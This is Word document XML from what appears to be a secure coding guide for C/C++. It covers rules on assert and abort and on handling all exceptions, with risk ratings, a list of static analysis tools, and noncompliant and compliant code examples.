          <w:p w14:paraId="270728FF" w14:textId="77777777" w:rsidR="00CE3AA7" w:rsidRDefault="00CE3AA7" w:rsidP="00CE3AA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8BC7F60" w14:textId="77777777" w:rsidR="00CE3AA7" w:rsidRDefault="00CE3AA7" w:rsidP="00CE3AA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 */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E312001" w14:textId="155BC54B" w:rsidR="00F72634" w:rsidRDefault="00CE3AA7" w:rsidP="00CE3AA7">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Calibri" w:hAnsi="Consolas"/>
                <w:color w:val="333333"/>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514513B4" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Use Effective Quality Assurance Techniques</w:t>
            </w:r>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Understanding assert and abort functions is key to using QA techniques. Assert is often called to test software in early iterations, aligning with this principle.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1A3C43" w14:paraId="599F0FE9" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325BC76A" w14:textId="16D70D04" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05FDEF4C" w14:textId="526B42D8" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D1FC84" w14:textId="53FABB8D" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D13FDB" w14:textId="1621909F" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018B5741" w14:textId="7B4E4DFC" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">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A3C43" w14:paraId="13CC4077" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="642C6635" w14:textId="5132B904" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1659F964" w14:textId="2B469675" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C127A7" w14:textId="78FEBFF5" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511AFF98" w14:textId="6EFC701A" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="31776F75" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DD1CB55" w14:textId="04088031" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId40" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Compass/ROSE</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="147234E7" w14:textId="552A92FE" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C643E28" w14:textId="5D560725" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB1863C" w14:textId="300AB0E0" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Can detect some violations of this rule. However, it can only detect violations involving abort() because assert() is implemented as a macro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="70B30499" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DFBB62B" w14:textId="466DF519" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId41" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C886138" w14:textId="2D371650" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270673C4" w14:textId="3452C350" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>44 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D93F88D" w14:textId="4CC6414A" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Enhanced enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="28383A14" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC45772" w14:textId="28094263" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId42"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6D5B7F9C" w14:textId="0E6A8C9B" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3B83A6" w14:textId="39FA063F" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>CERT_C-ERR06-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08365A70" w14:textId="55791A92" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Do not use assertions</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E3AA83B" w:rsidR="00381847" w:rsidRDefault="00F23C27">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F23C27">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Handle all exceptions</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5C30692" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="003F364F">
              <w:t>ERR</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00F23C27">
              <w:t>051</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00F23C27">
              <w:t>CPP</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7DF53768" w14:textId="4AE54226" w:rsidR="00381847" w:rsidRDefault="003F364F">
            <w:r>
              <w:t xml:space="preserve">All exceptions thrown must be caught by a matching exception handler, or the stack may not unwind correctly due to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>abort() being called so destructors may not be called.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0D69991" w:rsidR="00F72634" w:rsidRDefault="003F364F" w:rsidP="0015146B">
            <w:r>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:t xml:space="preserve">either f() nor main() catch exceptions thrown by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:t>throwing_func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F364F">
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="3CEA03A3" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5019BE2E"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void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>throwing_func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">() </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>noexcept</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(false</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="06A1D0FE"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08DB516E"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void f() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CFA26E"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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>throwing_func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="18973C04"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE62810"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="249BDA03"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int main() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A0763A9" w14:textId="77777777" w:rsidR="003F364F" w:rsidRPr="003F364F" w:rsidRDefault="003F364F" w:rsidP="003F364F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  f(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="728394A2" w14:textId="5886F135" w:rsidR="00F72634" w:rsidRDefault="003F364F" w:rsidP="003F364F">
            <w:r w:rsidRPr="003F364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921F77F" w:rsidR="00F72634" w:rsidRDefault="003F364F" w:rsidP="0015146B">
            <w:r>
              <w:t>Handles all exceptions, making sure the stack is unwound.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="5DBE36E7" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4B27C141"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void</w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>throwing_func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">() </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>noexcept</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(false</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4F2DB37A"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 </w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274B397F"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void</w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BE97F60"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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>throwing_func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="17C84F3C"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A945D9A"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 </w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D7CE9D"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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>main() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1E25A3"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  try</w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7196DECA"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    f(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="43EDDFE5"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  } catch</w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(...) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17B33F6B"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    // Handle error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52949C93" w14:textId="77777777" w:rsidR="003F364F" w:rsidRPr="003F364F" w:rsidRDefault="003F364F" w:rsidP="003F364F">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  }</w:t>
            </w:r>
          </w:p>
